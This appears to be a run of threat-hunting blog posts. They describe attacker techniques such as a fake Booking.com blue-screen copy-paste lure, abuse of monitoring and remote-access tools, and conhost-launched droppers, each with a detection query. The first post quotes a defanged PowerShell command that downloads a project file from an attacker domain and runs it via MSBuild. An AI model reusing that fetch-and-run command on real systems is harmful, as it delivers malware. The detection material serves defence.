Know Your Adversary

Hello everyone! Why are phishing emails needed if victims can run a malicious command themselves? Yes, today we’re once again looking at an interesting variant of User Execution: Malicious Copy and Paste (T1204.004) . In fact, phishing emails were still involved: this time the attackers disguised themselves as Booking.com. The email contained a link leading to a phishing website. When the victim clicked the “Refresh page” button, the browser switched to full-screen mode and displayed a familiar instruction to copy and paste a malicious command - this time cleverly disguised as a Blue Screen of Death . As for the command itself, it was also quite interesting and included the use of Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001) : powershell -c “start hxxps[://admin.booking[.]com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr hxxps://2fa-bns[.]com/ -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj” Detection: Pay attention to file...

Hello everyone! I promised you to keep posting and notify you on any interesting tactics, techniques and procedures. So, let's start the new year! Harlan Carvey (I'm sure you've read his books !) shared that adversaries started to use Controlio - a cloud-based employee monitoring and productivity analytics platform.  By the way, it's not the first time adversaries use similar tools. Another example is Rare Werewolf: the adversary leveraged  Mipko Employee Monitor. Look for suspicious communications for controlio[.]net: event_type: "dnsreqwin" AND dns_rname: "controlio.net" Look for suspicious executions of Controlio-related binaries: event_type: "processcreatewin" AND proc_file_productname: "controlio" Happy hunting!

Hello everyone! No, no more detection and hunting tips today! And yes, it's the last post for the Zeltser challenge! It was a definitely a hard one, but still it was fun! Thank you Dave for motivating me to start it! Thanks everyone who reacted to the posts and wrote kind words - it helped me a lot to finish it! It doesn't mean I stop posting! But I won't do it every day! Still, if I see something interesting - I share it with you! Thank you for reading the blog and see you next year!

Hello everyone! Today we'll look at another example of a very common technique - Remote Access Tools: Remote Desktop Software (T1219.002) . Ransomware gangs have lots of such tools in their arsenal. For example, Power Admin -  legitimate tool that provides functionality to monitor servers and applications, as well as file access auditing.  Of course, it may be a good target for detection and hunting, for example: event_type: "processcreatewin" AND proc_file_productname: "pa server monitor" See you tomorrow!

Hello everyone! We often talk (and see, of course) LOLBAS. So, let's look at another one, which became really popular among adversaries this year. So, our today's example - Arcane Werewolf . The adversary leverages conhost.exe to run the dropper: conhost.exe C:\Users\<USER>\AppData\Local\Temp\icon2.png One more example - running Loki 2.0 loader: conhost.exe %TEMP%\chrome_proxy.pdf As you can see, the threat actors quite suspicious file exensions, so we can use it to build a query: event_type: "processcreatewin" AND proc_file_path: "conhost.exe" AND cmdline: (*png OR *pdf) See you tomorrow!

Hello everyone! Today we'll talk about how ransomware gangs abuse legitimate software for  File and Directory Discovery (T1083) . And our example for today's post - NightSpire . Anong other tools, the gang leveraged Everything - a legitimate tool that enables an adversary to index files and get a deeper understanding of data available on the compromised system. So, this tool, especially if it's not widely used internaly, may be a good target for hunting: event_type: "processcreatewin" AND proc_file_originalfilename: "everything.exe" See you tomorrow!